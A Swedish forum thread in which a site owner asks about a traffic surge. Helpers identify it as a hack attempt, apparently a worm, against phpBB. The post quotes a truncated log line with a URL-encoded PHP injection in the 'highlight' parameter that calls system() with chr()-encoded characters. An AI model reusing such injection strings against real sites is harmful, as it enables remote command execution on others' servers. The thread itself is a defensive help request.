|
Har ett litet besökare problem just nu.
Enligt awstats så har jag 5000 - 6000 besökare helt plötsligt jag brukar ha runt 1200-1300 och det här ändrades på en dag vet inte hur alls. Jag vet inte hur jag ska kolla var trafiken kommer ifrån men loggen står det så här Kod:
Host: 217.154.1.226 /forum/viewtopic.php?t=225&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr( problemet med det här är att det äter bandbredd som *peep* bandbredd som jag inte har tillgång till just nu. Normalt ligger bandbredden på runt 300mb/per dag men nu är det runt 3gig per dag. Är lite vilse just nu kan det vara crawlers? det är olika ips alltid. Några som har några ideér? |
Tjohlahopp.
Det är nån som försöker hacka dig. De försöker utföra ett kommando via system-anropet i PHP. om du går till www.asciitable.com och kollar upp vad de olika bokstäverna inom chr() står för så kommer du att kunna läsa vad de försöker göra. (eller lyckas göra tom). Kommandot längst ner försöker göra "system('cd / ... ')". Det är troligen masken som andra har skrivit om på förstasidan här. |
Hej,
Jag har också blivit utsatt för detta och ganska ofta... har ingen aning va de gör å va som kan hända... tittade precis på asciitable.com men hittade inte de du kanste tänkte på? Kan du berätta lite mer va som händer tack =) |
Okay, nu har ja tittat nogrannare... om ja förstår rätt så kan de utföra komandon... hur stoppar man detta?
|
Läs vidare på phpbb.com
|
| Alla tider är GMT +2. Klockan är nu 21:04. |
Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson